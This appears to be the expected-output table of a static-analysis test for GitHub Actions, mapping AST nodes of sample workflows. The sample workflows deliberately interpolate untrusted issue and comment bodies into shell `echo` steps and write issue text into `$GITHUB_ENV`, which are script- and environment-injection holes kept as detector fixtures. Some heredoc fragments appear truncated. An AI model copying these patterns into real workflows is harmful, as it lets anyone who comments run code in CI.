.github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| 
.github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo 
'${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| 
.github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | 
.github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << 
EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| 
.github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| 
.github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | 
.github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | 
.github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | 
.github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> 
$GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho 
"FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" 
>> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | 